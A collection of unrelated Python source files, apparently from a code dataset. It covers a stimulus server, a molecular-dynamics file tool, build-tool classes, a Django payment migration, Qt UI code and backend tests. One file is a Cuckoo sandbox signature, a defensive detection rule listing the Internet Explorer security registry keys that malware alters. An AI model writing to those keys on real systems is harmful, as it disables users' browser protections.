# Copyright (c) 2002-2003 Andrew Straw. Distributed under the terms
# of the GNU Lesser General Public License (LGPL).
import VisionEgg, string
import sys, os, math
import VisionEgg.Core
import VisionEgg.FlowControl
import VisionEgg.SphereMap
import VisionEgg.PyroHelpers
import Pyro.core
from VisionEgg.PyroApps.ScreenPositionServer import ScreenPositionMetaController
from VisionEgg.PyroApps.ScreenPositionGUI import ScreenPositionParameters
from VisionEgg.PyroApps.SphereGratingGUI import SphereGratingMetaParameters
class SphereGratingExperimentMetaController( Pyro.core.ObjBase ):
    """Pyro-exposed controller that maps SphereGratingMetaParameters onto a
    perspective-distorted grating stimulus and its spherical window mask."""
    def __init__(self,screen,presentation,stimuli):
        # get stimuli — both entries must use the '3d_perspective' projection
        assert( stimuli[0][0] == '3d_perspective')
        assert( stimuli[1][0] == '3d_perspective')
        sphere_grating = stimuli[0][1]
        sphere_window = stimuli[1][1]
        Pyro.core.ObjBase.__init__(self)
        self.meta_params = SphereGratingMetaParameters()
        # Validate the collaborating objects up front so remote callers get
        # a clear error instead of a late attribute failure.
        if not isinstance(screen,VisionEgg.Core.Screen):
            raise ValueError("Expecting instance of VisionEgg.Core.Screen")
        if not isinstance(presentation,VisionEgg.FlowControl.Presentation):
            raise ValueError("Expecting instance of VisionEgg.FlowControl.Presentation")
        if not isinstance(sphere_grating,VisionEgg.SphereMap.SphereGrating):
            raise ValueError("Expecting instance of VisionEgg.SphereMap.SphereGrating")
        if not isinstance(sphere_window,VisionEgg.SphereMap.SphereWindow):
            raise ValueError("Expecting instance of VisionEgg.SphereMap.SphereWindow")
        self.p = presentation
        self.stim = sphere_grating
        self.window = sphere_window
        # Mid-gray background behind the grating.
        screen.parameters.bgcolor = (0.5, 0.5, 0.5, 0.0)
        # Gate the grating's 'on' parameter by trial time (see the two
        # on_function_* methods below).
        self.p.add_controller(self.stim,'on',VisionEgg.FlowControl.FunctionController(
            during_go_func=self.on_function_during_go,
            between_go_func=self.on_function_between_go))
    def __del__(self):
        # Detach our controller before the presentation outlives us.
        self.p.remove_controller(self.stim,'on')
        Pyro.core.ObjBase.__del__(self) # call base class
    def on_function_during_go(self,t):
        """Compute when the grating is on"""
        if t <= self.meta_params.pre_stim_sec:
            return 0 # not on yet
        elif t <= (self.meta_params.pre_stim_sec + self.meta_params.stim_sec):
            return 1 # on
        else:
            return 0 # off again
    def on_function_between_go(self):
        """Compute when the grating is off"""
        return 0 # off again
    def get_parameters(self):
        """Return the current SphereGratingMetaParameters (remote accessor)."""
        return self.meta_params
    def set_parameters(self, new_parameters):
        """Replace the meta parameters and push them to the stimuli."""
        if isinstance(new_parameters, SphereGratingMetaParameters):
            self.meta_params = new_parameters
        else:
            raise ValueError("Argument to set_parameters must be instance of SphereGratingMetaParameters")
        self.update()
    def update(self):
        """Copy meta parameters onto the grating, window and presentation."""
        stim_params = self.stim.parameters # shorthand
        window_params = self.window.parameters # shorthand
        meta_params = self.meta_params # shorthand
        stim_params.contrast = meta_params.contrast
        stim_params.orientation = meta_params.orient
        stim_params.spatial_freq_cpd = meta_params.sf
        stim_params.temporal_freq_hz = meta_params.tf
        # Grating and window share the same azimuth/elevation center.
        stim_params.grating_center_azimuth = meta_params.window_az
        stim_params.grating_center_elevation = meta_params.window_el
        self.p.parameters.go_duration = ( meta_params.pre_stim_sec + meta_params.stim_sec + meta_params.post_stim_sec, 'seconds')
        window_params.window_shape = meta_params.window_func
        window_params.window_shape_radius_parameter = meta_params.window_radius
        window_params.window_center_azimuth = meta_params.window_az
        window_params.window_center_elevation = meta_params.window_el
    def go(self):
        """Trigger one go loop (one trial) on the presentation."""
        self.p.parameters.enter_go_loop = 1
    def quit_server(self):
        """Ask the presentation's run_forever loop to exit."""
        self.p.parameters.quit = 1
def get_meta_controller_class():
    """Return the meta controller class exported by this server module."""
    return SphereGratingExperimentMetaController
def make_stimuli():
    """Create the sphere grating stimulus and its window mask.

    Returns a list of (projection_tag, stimulus) pairs; both entries carry
    the '3d_perspective' tag expected by the meta controller.
    """
    grating = VisionEgg.SphereMap.SphereGrating(radius=1.0,
                                                spatial_freq_cpd=1.0/9.0,
                                                temporal_freq_hz=1.0)
    window_mask = VisionEgg.SphereMap.SphereWindow(radius=0.95)
    return [('3d_perspective', grating), ('3d_perspective', window_mask)]
def get_meta_controller_stimkey():
    """Return the key under which the meta controller registers with Pyro."""
    return "sphere_grating_server"
# Don't do anything unless this script is being run
if __name__ == '__main__':
    # Pyro server that will expose the controllers to remote GUI clients.
    pyro_server = VisionEgg.PyroHelpers.PyroServer()
    screen = VisionEgg.Core.Screen.create_default()
    # get Vision Egg stimulus ready to go
    stimuli = make_stimuli()
    stimulus = stimuli[0][1]
    mask = stimuli[1][1]
    # Seed the perspective frustum from the default screen-position values.
    temp = ScreenPositionParameters()
    left = temp.left
    right = temp.right
    bottom = temp.bottom
    top = temp.top
    near = temp.near
    far = temp.far
    projection = VisionEgg.Core.PerspectiveProjection(left,
                                                      right,
                                                      bottom,
                                                      top,
                                                      near,
                                                      far)
    viewport = VisionEgg.Core.Viewport(screen=screen,stimuli=[stimulus,mask],projection=projection)
    p = VisionEgg.FlowControl.Presentation(viewports=[viewport])
    # now hand over control of projection to ScreenPositionMetaController
    projection_controller = ScreenPositionMetaController(p,projection)
    pyro_server.connect(projection_controller,"projection_controller")
    # now hand over control of grating and mask to SphereGratingExperimentMetaController
    meta_controller = SphereGratingExperimentMetaController(screen,p,stimuli)
    pyro_server.connect(meta_controller,get_meta_controller_stimkey())
    # get listener controller and register it
    p.add_controller(None,None, pyro_server.create_listener_controller())
    # enter endless loop
    p.run_forever()
|
CMD-at-ZIB/ZIBMolPy
|
tools/zgf_concatenate_stuff.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
What it does
============
This tool concatenates trr and edr files for unrestrained nodes as well as multistart nodes.
Please note: This functionality has also been integrated into zgf_mdrun. This tool is merely meant to provide this function for older node pools.
How it works
============
At the command line, type::
$ zgf_concatentate_stuff
"""
from ZIBMolPy.utils import check_call
from ZIBMolPy.pool import Pool
from ZIBMolPy.ui import Option, OptionsList
from ZIBMolPy.io.trr import TrrFile
import sys
import os
import re
import numpy as np
from subprocess import Popen, PIPE
# Command-line options understood by this tool (parsed in main()).
options_desc = OptionsList([
    Option("t", "trr", "bool", "concatenate trr files", default=False),
    Option("e", "edr", "bool", "concatenate edr files", default=False),
])
# Append the generated option documentation to the module docstring.
sys.modules[__name__].__doc__ += options_desc.epytext() # for epydoc
def is_applicable():
    """The tool applies when the pool holds at least one merge-able node."""
    return len(Pool().where("state == 'merge-able'")) > 0
#===============================================================================
def main():
    """Concatenate trr and/or edr files for all merge-able nodes in the pool."""
    options = options_desc.parse_args(sys.argv)[0]
    pool = Pool()
    # Lock the nodes so no other zgf tool touches them while we merge.
    needy_nodes = pool.where("state == 'merge-able'").multilock()
    if(len(needy_nodes) == 0):
        return
    # find out about trr time step
    dt = 0
    nodeDir = needy_nodes[0].dir.split('/')[-1]
    for fn in os.listdir(needy_nodes[0].dir):
        if re.match("^"+nodeDir+".+run\d+\.trr", fn):
            trr = TrrFile(needy_nodes[0].dir+"/"+fn)
            # NOTE(review): .next() is the Python 2 iterator protocol; under
            # Python 3 this would need next(...) — confirm target interpreter.
            dt = trr.first_frame.next().t - trr.first_frame.t
            trr.close()
            break
    # dt is sometimes noisy in the final digits (three digits is femtosecond step = enough)
    dt = np.around(dt, decimals=3)
    for n in needy_nodes:
        if(options.trr):
            # merge sampling trajectories
            # NOTE(review): the '.' before 'trr' is an unescaped regex dot and
            # matches any character — presumably harmless here, but verify.
            trr_fns = sorted([ fn for fn in os.listdir(n.dir) if re.match("[^#].+run\d+.trr", fn) ])
            cmd = ["trjcat", "-f"]
            cmd += trr_fns
            cmd += ["-o", "../../"+n.trr_fn, "-cat"]
            print("Calling: %s"%" ".join(cmd))
            check_call(cmd, cwd=n.dir)
        if(options.edr):
            # merge edr files
            # get list of edr-files
            edr_fnames = sorted([n.dir+"/"+fn for fn in os.listdir(n.dir) if re.match("[^#].+run\d+.edr", fn)])
            # One edr file per extension plus the initial run is expected.
            assert( len(edr_fnames) == n.extensions_counter+1 )
            assert( len(edr_fnames) == n.extensions_max+1 )
            time_offset = n.sampling_length+dt
            for edr_fn in edr_fnames[1:]:
                # adapt edr starting times (eneconv reads the new time on stdin)
                cmd = ["eneconv", "-f", edr_fn, "-o", edr_fn, "-settime"]
                print("Calling: "+(" ".join(cmd)))
                p = Popen(cmd, stdin=PIPE)
                p.communicate(input=(str(time_offset)+"\n"))
                assert(p.wait() == 0)
                time_offset += n.extensions_length+dt
            # concatenate edr files with adapted starting times
            cmd = ["eneconv", "-f"] + edr_fnames + ["-o", n.dir+"/ener.edr"]
            print("Calling: "+(" ".join(cmd)))
            p = Popen(cmd)
            retcode = p.wait()
            assert(retcode == 0)
    needy_nodes.unlock()
#===============================================================================
# Script entry point.
if __name__ == "__main__":
    main()
#EOF
|
dlu-ch/dlb
|
src/dlb/ex/input.py
|
# SPDX-License-Identifier: LGPL-3.0-or-later
# dlb - a Pythonic build tool
# Copyright (C) 2020 Daniel Lutz <dlu-ch@users.noreply.github.com>
"""Input dependency classes for tools."""
import re
import dataclasses
from typing import Dict, Pattern, Union
from . import _depend
class RegularFile(_depend.NonDirectoryMixin, _depend.InputDependency):
    """Input dependency on a regular (non-directory) filesystem path."""
    pass
class NonRegularFile(_depend.NonDirectoryMixin, _depend.InputDependency):
    """Input dependency on a non-regular, non-directory filesystem object
    (e.g. a symlink or device node — exact set defined by the mixin)."""
    pass
class Directory(_depend.DirectoryMixin, _depend.InputDependency):
    """Input dependency on a directory path."""
    pass
class EnvVar(_depend.InputDependency):
    """Input dependency on an environment variable whose content must match
    a validation pattern. Must not carry a multiplicity."""
    @dataclasses.dataclass(frozen=True, eq=True)
    class Value:
        # Validated environment variable content: variable name, the raw
        # string value, and the pattern's named groups.
        name: str
        raw: str
        groups: Dict[str, str]
    def __init__(self, *, name: str, pattern: Union[str, Pattern], example: str, **kwargs):
        """Create the dependency.

        name: environment variable name (non-empty str).
        pattern: validation regex (str or compiled); must fully match values.
        example: a sample value; must itself match *pattern*.
        """
        super().__init__(**kwargs)
        if not isinstance(name, str):
            raise TypeError("'name' must be a str")
        if not name:
            raise ValueError("'name' must not be empty")
        # Accept a plain string and compile it so self._pattern is uniform.
        if isinstance(pattern, str):
            pattern = re.compile(pattern)
        if not isinstance(pattern, Pattern):
            raise TypeError("'pattern' must be regular expression (compiled or str)")
        if not isinstance(example, str):
            raise TypeError("'example' must be a str")
        # The example doubles as documentation; reject one that would not validate.
        if not pattern.fullmatch(example):
            raise ValueError(f"'example' is not matched by 'pattern': {example!r}")
        if self.multiplicity is not None:
            raise ValueError("must not have a multiplicity")
        self._name = name
        self._pattern: Pattern = pattern
        self._example = example
    @property
    def name(self) -> str:
        return self._name
    @property
    def pattern(self) -> Pattern:
        return self._pattern
    @property
    def example(self) -> str:
        return self._example
    def compatible_and_no_less_restrictive(self, other) -> bool:
        """True if *other* is base-compatible and has the same name/pattern."""
        if not super().compatible_and_no_less_restrictive(other):
            return False
        return self.name == other.name and self.pattern == other.pattern  # ignore example
    def validate_single(self, value) -> 'EnvVar.Value':
        # value is used to define the content of a (future) environment variable
        value = super().validate_single(value)
        if not isinstance(value, str):
            raise TypeError("'value' must be a str")
        m = self._pattern.fullmatch(value)
        if not m:
            raise ValueError(f"value {value!r} is not matched by validation pattern {self._pattern.pattern!r}")
        # noinspection PyCallByClass
        return EnvVar.Value(name=self.name, raw=value, groups=m.groupdict())
|
gitaarik/adyengo
|
adyengo/migrations/0007_auto_20160527_2341.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-05-27 21:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations (Django 1.9). Relaxes and
    # normalizes field definitions on the notification, session and
    # payment-method models: most notification text fields become optional
    # (blank/null) and the choice sets for currencies, locales and payment
    # methods are refreshed. Do not hand-edit applied migrations; create a
    # follow-up migration instead.
    dependencies = [
        ('adyengo', '0006_auto_20160527_2051'),
    ]
    operations = [
        migrations.AlterField(
            model_name='notification',
            name='currency_code',
            field=models.CharField(choices=[('EUR', 'Euro')], default='EUR', max_length=3),
        ),
        migrations.AlterField(
            model_name='notification',
            name='event_code',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='event_date',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='ip_address',
            field=models.CharField(blank=True, max_length=45, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='merchant_account_code',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='merchant_reference',
            field=models.CharField(blank=True, max_length=128, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='operations',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='original_reference',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='payment_method',
            field=models.CharField(blank=True, choices=[('bankTransfer_DE', 'German Banktransfer'), ('directEbanking', 'SofortUberweisung'), ('paypal', 'PayPal'), ('amex', 'Amex'), ('bankTransfer', 'All banktransfers'), ('mc', 'Master Card'), ('bankTransfer_NL', 'Dutch Banktransfer'), ('visa', 'Visa'), ('ideal', 'iDEAL'), ('card', 'All debit and credit cards'), ('elv', 'ELV'), ('directdebit_NL', 'Direct Debit (Netherlands)')], max_length=50, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='psp_reference',
            field=models.CharField(blank=True, max_length=150, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='reason',
            field=models.CharField(blank=True, max_length=250, null=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='session',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='adyengo.Session'),
        ),
        migrations.AlterField(
            model_name='recurringpaymentresult',
            name='result_code',
            field=models.CharField(choices=[('Error', 'Error'), ('Refused', 'Refused'), ('Authorised', 'Authorised')], max_length=30),
        ),
        migrations.AlterField(
            model_name='session',
            name='country_code',
            field=models.CharField(blank=True, choices=[('BE', 'Belgium'), ('GB', 'United Kingdom'), ('DE', 'Germany'), ('NL', 'Netherlands')], max_length=2),
        ),
        migrations.AlterField(
            model_name='session',
            name='currency_code',
            field=models.CharField(choices=[('EUR', 'Euro')], default='EUR', max_length=3),
        ),
        migrations.AlterField(
            model_name='session',
            name='page_type',
            field=models.CharField(choices=[('multiple', 'Multiple'), ('skip', 'Skip'), ('single', 'Single')], default='multiple', max_length=15),
        ),
        migrations.AlterField(
            model_name='session',
            name='recurring_contract',
            field=models.CharField(blank=True, choices=[('ONECLICK', 'One click'), ('RECURRING,ONECLICK', 'Recurring and One click (user chooses)'), ('RECURRING', 'Recurring')], max_length=50),
        ),
        migrations.AlterField(
            model_name='session',
            name='session_type',
            field=models.CharField(choices=[('api_recurring', 'API Recurring'), ('hpp_regular', 'HPP Regular'), ('hpp_recurring', 'HPP Recurring')], max_length=25),
        ),
        migrations.AlterField(
            model_name='session',
            name='shopper_locale',
            field=models.CharField(blank=True, choices=[('nl_NL', 'Dutch (Holland)'), ('en_GB', 'English (United Kingdom)'), ('de_DE', 'German (Germany)'), ('nl_BE', 'Dutch (Belgium)'), ('fr_BE', 'French (Belgium)')], default='nl_NL', max_length=5),
        ),
        migrations.AlterField(
            model_name='session',
            name='skin_code',
            field=models.CharField(default='BCS1MHG2', max_length=10),
        ),
        migrations.AlterField(
            model_name='sessionallowedpaymentmethods',
            name='method',
            field=models.CharField(choices=[('bankTransfer_DE', 'German Banktransfer'), ('directEbanking', 'SofortUberweisung'), ('paypal', 'PayPal'), ('amex', 'Amex'), ('bankTransfer', 'All banktransfers'), ('mc', 'Master Card'), ('bankTransfer_NL', 'Dutch Banktransfer'), ('visa', 'Visa'), ('ideal', 'iDEAL'), ('card', 'All debit and credit cards'), ('elv', 'ELV'), ('directdebit_NL', 'Direct Debit (Netherlands)')], max_length=50),
        ),
        migrations.AlterField(
            model_name='sessionblockedpaymentmethods',
            name='method',
            field=models.CharField(choices=[('bankTransfer_DE', 'German Banktransfer'), ('directEbanking', 'SofortUberweisung'), ('paypal', 'PayPal'), ('amex', 'Amex'), ('bankTransfer', 'All banktransfers'), ('mc', 'Master Card'), ('bankTransfer_NL', 'Dutch Banktransfer'), ('visa', 'Visa'), ('ideal', 'iDEAL'), ('card', 'All debit and credit cards'), ('elv', 'ELV'), ('directdebit_NL', 'Direct Debit (Netherlands)')], max_length=50),
        ),
    ]
|
danielhrisca/asammdf
|
asammdf/gui/ui/fft_window.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'fft_window.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FFTWindow(object):
    # Generated by pyuic5 from fft_window.ui; manual edits here are lost
    # when the .ui file is recompiled.
    def setupUi(self, FFTWindow):
        """Build the FFT window's widget hierarchy on *FFTWindow*."""
        FFTWindow.setObjectName("FFTWindow")
        FFTWindow.resize(640, 480)
        self.centralwidget = QtWidgets.QWidget(FFTWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
        self.horizontalLayout.setObjectName("horizontalLayout")
        # Left column: the three frequency spin boxes with their labels.
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName("verticalLayout")
        self.label_2 = QtWidgets.QLabel(self.centralwidget)
        self.label_2.setObjectName("label_2")
        self.verticalLayout.addWidget(self.label_2)
        self.start_frequency = QtWidgets.QDoubleSpinBox(self.centralwidget)
        self.start_frequency.setDecimals(3)
        self.start_frequency.setMinimum(0.001)
        self.start_frequency.setMaximum(1000000.0)
        self.start_frequency.setProperty("value", 1.0)
        self.start_frequency.setObjectName("start_frequency")
        self.verticalLayout.addWidget(self.start_frequency)
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setObjectName("label")
        self.verticalLayout.addWidget(self.label)
        self.end_frequency = QtWidgets.QDoubleSpinBox(self.centralwidget)
        self.end_frequency.setDecimals(3)
        self.end_frequency.setMinimum(0.001)
        self.end_frequency.setMaximum(1000000.0)
        self.end_frequency.setProperty("value", 1000.0)
        self.end_frequency.setObjectName("end_frequency")
        self.verticalLayout.addWidget(self.end_frequency)
        self.label_3 = QtWidgets.QLabel(self.centralwidget)
        self.label_3.setObjectName("label_3")
        self.verticalLayout.addWidget(self.label_3)
        self.frequency_step = QtWidgets.QDoubleSpinBox(self.centralwidget)
        self.frequency_step.setDecimals(3)
        self.frequency_step.setMinimum(0.001)
        self.frequency_step.setMaximum(1000000.0)
        self.frequency_step.setProperty("value", 1.0)
        self.frequency_step.setObjectName("frequency_step")
        self.verticalLayout.addWidget(self.frequency_step)
        # Spacer pushes the controls to the top of the column.
        spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        self.horizontalLayout.addLayout(self.verticalLayout)
        # Right column: empty layout filled by the application with the plot.
        self.layout = QtWidgets.QVBoxLayout()
        self.layout.setObjectName("layout")
        self.horizontalLayout.addLayout(self.layout)
        self.horizontalLayout.setStretch(1, 1)
        FFTWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(FFTWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 21))
        self.menubar.setObjectName("menubar")
        FFTWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(FFTWindow)
        self.statusbar.setObjectName("statusbar")
        FFTWindow.setStatusBar(self.statusbar)
        self.retranslateUi(FFTWindow)
        QtCore.QMetaObject.connectSlotsByName(FFTWindow)
    def retranslateUi(self, FFTWindow):
        """Apply translated label texts and spin-box suffixes."""
        _translate = QtCore.QCoreApplication.translate
        FFTWindow.setWindowTitle(_translate("FFTWindow", "MainWindow"))
        self.label_2.setText(_translate("FFTWindow", "Start frequency"))
        self.start_frequency.setSuffix(_translate("FFTWindow", "Hz"))
        self.label.setText(_translate("FFTWindow", "End frequency"))
        self.end_frequency.setSuffix(_translate("FFTWindow", "Hz"))
        self.label_3.setText(_translate("FFTWindow", "Frequency step"))
        self.frequency_step.setSuffix(_translate("FFTWindow", "Hz"))
|
pjohansson/flowtools-rewrite
|
strata/dataformats/write.py
|
"""Module for outputting data."""
# BUG FIX: the docstring above previously appeared after the import, where
# it was a no-op string expression and the module's __doc__ stayed None.

import strata.dataformats as formats

# Set module handles for ftype; 'default' aliases the simple binary writer.
default_module = formats.simple.main
modules = {
    'default': default_module,
    'simple': formats.simple.main,
    'simple_plain': formats.simple.main
}
def write(path, data, *args, **kwargs):
    """Output data to a path.

    Selects a writer module by file type and calls its 'write_data'
    function. The module can be chosen explicitly with the keyword
    argument 'ftype'. Remaining arguments and keyword arguments are
    passed through.

    Args:
        path (str): Write to a file at this path.
        data (dict): Data to write.

    Keyword Args:
        ftype (str, default='default'): File type to write. Choices:
            'simple' - Simple binary (strata.dataformats.simple)
            'simple_plain' - Simple plaintext (strata.dataformats.simple)

    Raises:
        KeyError: If a non-existant 'ftype' is specified.
    """
    ftype = kwargs.pop('ftype', 'default')
    # BUG FIX: membership was previously checked with `assert`, which is
    # stripped under `python -O`, silently skipping validation.
    if ftype not in modules:
        raise KeyError("specified 'ftype' not existing for writing.")
    if ftype == 'simple_plain':
        # The plaintext variant is the simple writer with binary disabled.
        kwargs.update({'binary': False})
    modules[ftype].write_data(path, data, *args, **kwargs)
def flowdata_to_dict(flow):
    """Convert a FlowData object to a write-compatible dictionary.

    Args:
        flow (FlowData): Object to convert; its `data` attribute is a
            structured array whose field names become the dict keys.

    Returns:
        dict: Field name mapped to that field's column of `flow.data`.
    """
    fields = flow.data.dtype.names
    return dict((name, flow.data[name]) for name in fields)
|
laurentb/weboob
|
modules/radiofrance/test.py
|
# -*- coding: utf-8 -*-
# Copyright(C) 2011-2012 Romain Bignon, Laurent Bachelier
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
from weboob.capabilities.audio import BaseAudio
from weboob.capabilities.radio import Radio
import itertools
class RadioFranceTest(BackendTest):
    # Live-backend tests: every method exercises the real radiofrance
    # website through the weboob backend, so they require network access.
    MODULE = 'radiofrance'
    def test_ls_radios_and_selections(self):
        """List radios at the root and under 'francebleu'; check each has
        streams and that any 'selection' audio entries carry a URL."""
        l = list(self.backend.iter_resources(objs=[Radio], split_path=[]))
        self.assertTrue(0 < len(l) < 30)
        for radio in l:
            name = radio.split_path[-1]
            # 'francebleu' is a container of local stations, handled below.
            if name != 'francebleu':
                streams = self.backend.get_radio(name).streams
                self.assertTrue(len(streams) > 0)
                l_sel = list(self.backend.iter_resources(objs=[BaseAudio], split_path=[name, 'selection']))
                if len(l_sel) > 0:
                    self.assertTrue(len(l_sel[0].url) > 0)
        l = list(self.backend.iter_resources(objs=[Radio], split_path=['francebleu']))
        self.assertTrue(len(l) > 30)
        for radio in l:
            streams = self.backend.get_radio(radio.split_path[-1]).streams
            self.assertTrue(len(streams) > 0)
            l_sel1 = list(self.backend.iter_resources(objs=[BaseAudio],
                                                      split_path=['francebleu',
                                                                  radio.split_path[-1]]))
            if 'Selection' in [el.title for el in l_sel1]:
                l_sel = list(self.backend.iter_resources(objs=[BaseAudio],
                                                         split_path=['francebleu',
                                                                     radio.split_path[-1],
                                                                     'selection']))
                if len(l_sel) > 0:
                    self.assertTrue(len(l_sel[0].url) > 0)
    def test_podcasts(self):
        """For each radio advertising podcasts, fetch one and check its URL."""
        for key, item in self.backend._RADIOS.items():
            if 'podcast' in item:
                emissions = list(self.backend.iter_resources(objs=[BaseAudio], split_path=[key, 'podcasts']))
                self.assertTrue(len(emissions) > 0)
                podcasts = list(self.backend.iter_resources(objs=[BaseAudio], split_path=emissions[0].split_path))
                self.assertTrue(len(podcasts) > 0)
                podcast = self.backend.get_audio(podcasts[0].id)
                self.assertTrue(podcast.url)
    def test_search_radio(self):
        """Radio search for 'bleu' returns at least one radio with streams."""
        l = list(self.backend.iter_radios_search('bleu'))
        self.assertTrue(len(l) > 0)
        self.assertTrue(len(l[0].streams) > 0)
    def test_search_get_audio(self):
        """Audio search yields results whose first item resolves to a URL."""
        l = list(itertools.islice(self.backend.search_audio('jou'), 0, 20))
        self.assertTrue(len(l) > 0)
        a = self.backend.get_audio(l[0].id)
        self.assertTrue(a.url)
|
lixiangning888/whole_project
|
modules/signatures_orginal_20151110/browser_security.py
|
# Copyright (C) 2015 Kevin Ross, Optiv, Inc. (brad.spengler@optiv.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class BrowserSecurity(Signature):
    """Detects writes to registry keys that weaken browser security
    (Internet Explorer zones, phishing filter, certificate revocation...)."""
    name = "browser_security"
    description = "Attempts to modify browser security settings"
    severity = 3
    categories = ["browser", "clickfraud", "banker"]
    authors = ["Kevin Ross", "Optiv"]
    minimum = "1.2"

    def run(self):
        """Return True as soon as any monitored registry key was written."""
        reg_indicators = [
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Privacy\\\\EnableInPrivateMode$",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\PhishingFilter\\\\.*",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\Zones\\\\[0-4]\\\\.*",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\Domains\\\\.*",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\EscDomains\\\\.*",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\EscRanges\\\\.*",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\IEHarden$",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\CertificateRevocation$",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Main\\\\NoUpdateCheck$",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Security\\\\.*",
            ".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Main\\\\FeatureControl\\\\.*",
        ]
        # any() short-circuits exactly like the original for-loop did.
        return any(self.check_write_key(pattern=indicator, regex=True)
                   for indicator in reg_indicators)
|
igemsoftware/SYSU-Software_2014
|
tests/test_simulation.py
|
import json
from . import TestCase
class TestSimulationBase(TestCase):
    """Shared fixture: loads the preprocessed-simulation JSON files into
    ``self.simulations`` keyed by logic type."""

    # Logic circuit types for which a 'tests/preprocess_<name>.json'
    # fixture file exists.
    LOGIC_TYPES = ('repressilator', 'toggle_switch_1', 'toggle_switch_2',
                   'inverter', 'simple', 'and_gate', 'or_gate')

    def setUp(self):
        # Bug fix: the original wrote `for logic_type in logic_type:`,
        # shadowing the list it iterated over.
        self.simulations = {}
        for logic_type in self.LOGIC_TYPES:
            with open('tests/preprocess_%s.json' % logic_type) as fobj:
                self.simulations[logic_type] = json.load(fobj)
class TestSimulationPreprocess(TestSimulationBase):
    """Tests for the /simulation/preprocess endpoint: each circuit layout
    must preprocess into the stored fixture for its logic type."""

    def _assert_preprocess(self, circuits, logic_type):
        """POST *circuits* to the preprocess endpoint and compare the JSON
        response against the fixture loaded for *logic_type*."""
        result = self.client.post('/simulation/preprocess',
                                  data=json.dumps(circuits)).json
        self.assertDictContainsRecursively(result,
                                           self.simulations[logic_type])

    def test_preprocess_repressilator(self):
        self._assert_preprocess([
            {'inputs': [{'id': 1, 'promoter_id': 17, 'receptor_id': 1}],
             'logics': [1], 'outputs': []}
        ], 'repressilator')

    def test_preprocess_toggle_switch_1(self):
        self._assert_preprocess([
            {'inputs': [{'id': 3, 'promoter_id': 9, 'receptor_id': 4},
